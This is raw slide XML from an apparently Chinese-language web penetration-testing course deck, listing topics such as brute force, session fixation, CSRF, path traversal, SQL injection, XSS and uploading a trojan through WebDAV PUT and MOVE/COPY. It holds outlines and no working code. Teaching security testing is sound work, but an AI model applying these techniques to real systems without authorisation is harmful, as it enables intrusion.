              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MOVE/COPY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>方法上传木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PROPFIND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>方法浏览目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14587643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457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>渗透攻击探测阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26315646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简介</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>访问控制测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参数过滤测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>逻辑功能测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>阻断服务测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8450172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访问控制测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>控制测试是验证合法用户身份，主要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三种方式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>会话测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>授权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21889498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访问控制测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>认证测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>暴力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>破解测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>密码强度测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户名枚举测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>密码猜测的适应性测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>验证码功能测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11196649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访问控制测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>认证测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>功能攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>账户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>恢复功能测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>记住我”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>功能测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试伪装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3911970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457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的兴起</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36297382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访问控制测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>认证测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>证书</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>功能攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>唯一性测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应用默认用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试证书的可预测性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>不安全证书传输测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>不安全证书分配测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>不安全证书分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>存储</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22261267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访问控制测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>认证测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>逻辑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击故障开放条件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>特殊功能逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20195442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访问控制测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会话管理测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>令牌的可预测性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>不安全令牌传输探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>令牌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>会话映射探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>固定会话攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>会话期限不足攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17931627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访问控制测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>授权测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>遍历测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>绕过授权模式测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>提权测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34152613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参数过滤测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>数据库注入测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>数据库注入测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>数据库注入测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>数据库注入测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5663687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参数过滤测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反射</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
